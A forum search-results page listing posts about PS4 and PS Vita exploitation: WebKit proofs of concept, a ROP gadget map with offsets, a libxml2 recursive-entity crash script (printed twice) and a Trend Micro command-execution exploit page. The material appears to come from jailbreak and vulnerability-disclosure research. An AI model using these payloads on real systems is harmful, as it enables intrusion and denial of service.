Search found 8 matches
- Fri Oct 14, 2016 3:08 pm
- Forum: Programming and Security
- Topic: PS4 4.01 Webkit Exploits ( POC , no ROP yet)
- Replies: 2
- Views: 15243
PS4 4.01 Webkit Exploits ( POC , no ROP yet)
This repository contains all the WebKit Vulnerabilities that affect the PS4 on version 4.01 ( Not tested on lower versions, but could be ported with enough development). Keep in mind that it's not a ROP, so it won't give you access to SysModules, Dumping, FSBrowsing and all that. It's just a Proof O...
- Thu Sep 29, 2016 4:59 am
- Forum: Programming and Security
- Topic: PS4 3.55 Full Browser FileSystem and extensive Gadget list
- Replies: 3
- Views: 12166
- Wed Sep 28, 2016 5:09 pm
- Forum: Programming and Security
- Topic: PS4 3.55 Full Browser FileSystem and extensive Gadget list
- Replies: 3
- Views: 12166
PS4 3.55 Updated and more extensive Gadget List.
gadgetMap = { 'PlayStation 4 3.55': { 'xchg rax, rsp; dec dword ptr [rax - 0x77]': new gadget(VTABLE, -0x18a353f), 'pop rcx; pop rcx': new gadget(VTABLE, -0x5e970c), 'add dword ptr [rax - 0x77], ecx': new gadget(VTABLE, -0x18c3d40), 'mov qword ptr [rdi], rax': new gadget(VTABLE, -0x2372c99), 'sysca...
- Wed Sep 28, 2016 5:07 pm
- Forum: Programming and Security
- Topic: PS4 3.55 Full Browser FileSystem and extensive Gadget list
- Replies: 3
- Views: 12166
PS4 3.55 Full Browser FileSystem and extensive Gadget list
d /. d /.. d /dev c /dev/dipsw c /dev/dmem0 c /dev/dmem1 c /dev/dmem2 c /dev/ctty c /dev/deci_stdout c /dev/deci_stderr c /dev/deci_tty2 c /dev/deci_tty3 c /dev/deci_tty4 c /dev/deci_tty5 c /dev/deci_tty6 c /dev/deci_tty7 c /dev/deci_ttya0 c /dev/deci_ttyb0 c /dev/deci_ttyc0 c /dev/deci_stdin c /de...
- Wed May 04, 2016 6:06 am
- Forum: Programming and Security
- Topic: Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?
- Replies: 9
- Views: 12028
Re: Libxml2 exploit poc, possible ps4 port?
Script:
#!/bin/python3
f = open('repo.xml', 'w')
f.write( "<!DOCTYPE a [ ")
i = 1
while (i < 30000):
f.write ("<!ENTITY a" + str(i) + " \"&a" + str(i+1) + ";\">")
i = i+1
f.write("<!ENTITY a" + str(i+1) + " \"&a1;\">]> <bruces bogans=\"&a1;\">")
f.close()
#!/bin/python3
f = open('repo.xml', 'w')
f.write( "<!DOCTYPE a [ ")
i = 1
while (i < 30000):
f.write ("<!ENTITY a" + str(i) + " \"&a" + str(i+1) + ";\">")
i = i+1
f.write("<!ENTITY a" + str(i+1) + " \"&a1;\">]> <bruces bogans=\"&a1;\">")
f.close()
- Wed May 04, 2016 6:05 am
- Forum: Programming and Security
- Topic: Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?
- Replies: 9
- Views: 12028
Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?
Hi This is a disclosure of the following issue that was raised a week ago on the distro's mailing list. Both bugs on the gnome bugtracker are currently private and should be made public now. A couple of weeks back while working on a related bug [CVE-2016-3627] I discovered a specially created xml fi...
- Mon Jan 11, 2016 10:53 pm
- Forum: Programming and Security
- Topic: Possible PS4 3.11 Out of Bound Read (Freetype 64bit exploit)
- Replies: 2
- Views: 11549
Possible PS4 3.11 Out of Bound Read (Freetype 64bit exploit)
Source: https://code.google.com/p/google-security-research/issues/detail?id=614 The following heap-based out-of-bounds memory read has been encountered in FreeType. It has been reproduced with the current version of freetype2 from master git branch, with a 64-bit build of the ftbench utility compile...
- Mon Jan 11, 2016 10:49 pm
- Forum: Programming and Security
- Topic: PS Vita Command Execution through Trend Micro (exploit)
- Replies: 3
- Views: 4325
PS Vita Command Execution through Trend Micro (exploit)
<html> <head> <title>Trend Micro Exploit</title> </head> <body> <p> Sample exploit for Trend Micro . <p> <p> Command: <input id="command" value="insert command here" size="64"> <p> <a href="javascript:begin()">Click Here</a> to run the command above <p> <img src="http://reactiongifs.us/wp-content/up...